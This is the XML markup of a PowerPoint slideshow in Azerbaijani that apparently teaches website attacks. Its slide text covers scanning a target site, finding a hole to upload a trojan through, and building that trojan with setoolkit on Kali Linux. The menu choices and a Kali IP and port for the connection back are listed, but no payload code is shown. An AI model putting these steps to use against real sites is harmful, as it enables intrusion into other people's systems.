              <a:t>parametri ilə hal hazırda olduğumuz faylın içərisində yeni bir fayl açıb scanın cavablarını ora yerləşdirməsini deyirik və ardından yeni fayılın adını yazırıq </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sonra isə boşluq qoyaraq hədəf shifənin linkini</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048644" name="Mətn Qutusu 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6498021" y="5535038"/>
            <a:ext cx="5155715" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 18 dəqiqə sonra bitir və bayaq qeyd etdiyimiz </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>scanın</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> cavablarının olduğu fayla giririk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45"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46" name="Rectangle 11"/>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65" name="Şəkil 4" descr="Şəkil ehtiva edir mətn, qara  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="9470" b="3279"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-337933" y="-1"/>
            <a:ext cx="9799984" cy="6857990"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>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p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048647"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48" name="Mətn Qutusu 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9433296" y="1997833"/>
            <a:ext cx="3096638" cy="2758441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="000080"/>
                </a:highlight>
              </a:rPr>
              <a:t>Netice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0"/>
              <a:t> qovluğunda</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="tr-TR" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="000080"/>
                </a:highlight>
              </a:rPr>
              <a:t>İndex.html</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0"/>
              <a:t>faylını</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0"/>
              <a:t>açırıq</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048649" name="Düzbucaqlı 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6321287" y="2375452"/>
            <a:ext cx="1113183" cy="116287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650" name="Düzbucaqlı 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2587557"/>
            <a:ext cx="836579" cy="106031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51"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52" name="Rectangle 11"/>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66" name="Şəkil 4" descr="Şəkil ehtiva edir mətn  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="19744" r="1" b="6624"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="756588" y="291178"/>
            <a:ext cx="10206785" cy="4885149"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="228600" cap="sq" cmpd="thickThin">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst>
            <a:innerShdw blurRad="76200">
              <a:srgbClr val="000000"/>
            </a:innerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048653"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54" name="Düzbucaqlı 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1046375" y="3670538"/>
            <a:ext cx="6834433" cy="33074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655" name="Mətn Qutusu 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="756588" y="5467505"/>
            <a:ext cx="11196600" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0"/>
              <a:t>Trojanı yükləyəcəyimiz shifədə açığın olduğu bildikdən sonra trojanı hazırlamağa keçirik</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48656"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145732" name="Straight Connector 70"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noGrp="1" noRot="1" noChangeAspect="1" noMove="1" noResize="1" noEditPoints="1" noAdjustHandles="1" noChangeArrowheads="1" noChangeShapeType="1"/>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48657" name="Rectangle 7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8" name="Mətn Qutusu 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8809853" y="266188"/>
            <a:ext cx="3464109" cy="6336526"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" i="1" kern="1200" spc="100" baseline="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>setoolkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" i="1" kern="1200" spc="100" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t> ilə </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" i="1" kern="1200" spc="100" baseline="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>KaliLinux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" i="1" kern="1200" spc="100" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t> da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" i="1" kern="1200" spc="100" baseline="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" i="1" kern="1200" spc="100" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t> düz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" i="1" spc="100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>əldirik</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="3600" i="1" spc="100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="3600" i="1" spc="100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" i="1" spc="100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Terminalı açırıq və </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" i="1" spc="100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="000080"/>
                </a:highlight>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>setoolkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" i="1" spc="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="000080"/>
                </a:highlight>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" i="1" spc="100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>yazırıq yükləmə </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" i="1" spc="100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>tamamlandıqda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" i="1" spc="100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t> sual verəcək </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="3600" i="1" spc="100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>«yes»</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" i="1" spc="100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t> yazıb </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" i="1" spc="100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>enterə</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" i="1" spc="100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t> basırıq</a:t>
            </a:r>
            <a:endParaRPr lang="az-Latn-AZ" sz="3600" i="1" kern="1200" spc="100" baseline="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2097167" name="Şəkil 8" descr="Şəkil ehtiva edir mətn  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="7857"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="81966" y="83021"/>
            <a:ext cx="8645925" cy="6691959"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3145733" name="Straight Connector 74"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noGrp="1" noRot="1" noChangeAspect="1" noMove="1" noResize="1" noEditPoints="1" noAdjustHandles="1" noChangeArrowheads="1" noChangeShapeType="1"/>
          </p:cNvCxnSpPr>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8659" name="Freeform 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noMove="1" noResize="1" noEditPoints="1" noAdjustHandles="1" noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
          </p:cNvSpPr>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048660" name="Düzbucaqlı 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="389106" y="83020"/>
            <a:ext cx="690662" cy="18316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2097167"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="700"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2097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F0315"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp useBgFill="1">
        <p:nvSpPr>
          <p:cNvPr id="1048661" name="Rectangle 78"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noMove="1" noResize="1" noEditPoints="1" noAdjustHandles="1" noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
          </p:cNvSpPr>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97168" name="Şəkil 10" descr="Şəkil ehtiva edir mətn, ekran, qara, ani görüntü  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="586" r="19196" b="-1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="296522" y="3533251"/>
            <a:ext cx="5799477" cy="2783429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="190500" algn="tl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="70000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2097169" name="Şəkil 12" descr="Şəkil ehtiva edir mətn  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect t="486" r="-3" b="-3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6244765" y="3533251"/>
            <a:ext cx="5796945" cy="2783429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="190500" algn="tl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="70000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2097170" name="Şəkil 4" descr="Şəkil ehtiva edir mətn  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect t="57949" b="-131"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="296523" y="377687"/>
            <a:ext cx="5799477" cy="2956259"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="190500" algn="tl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="70000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2097171" name="Şəkil 8" descr="Şəkil ehtiva edir mətn  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect l="1" t="58693" r="1" b="-1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6244765" y="355585"/>
            <a:ext cx="5796945" cy="2947062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="190500" algn="tl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="70000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048662" name="Mətn Qutusu 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3500337" y="2001225"/>
            <a:ext cx="2136841" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt; Enter</a:t>
            </a:r>
            <a:endParaRPr lang="az-Latn-AZ" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048663" name="Mətn Qutusu 45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9904869" y="1994984"/>
            <a:ext cx="2136841" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt; Enter</a:t>
            </a:r>
            <a:endParaRPr lang="az-Latn-AZ" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048664" name="Mətn Qutusu 47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3500337" y="6223597"/>
            <a:ext cx="2136841" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt; Enter</a:t>
            </a:r>
            <a:endParaRPr lang="az-Latn-AZ" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048665" name="Mətn Qutusu 48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7101991" y="6210027"/>
            <a:ext cx="4082492" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>KaliLinux IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>və PORT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="az-Latn-AZ" sz="3200"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66"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67" name="Rectangle 11"/>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72" name="Şəkil 4" descr="Şəkil ehtiva edir mətn  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="815512" y="3035419"/>
            <a:ext cx="9893338" cy="3587928"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="228600" cap="sq" cmpd="thickThin">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst>
            <a:innerShdw blurRad="76200">
              <a:srgbClr val="000000"/>
            </a:innerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048668"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69" name="Mətn Qutusu 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="652973" y="0"/>
            <a:ext cx="10886053" cy="2631440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
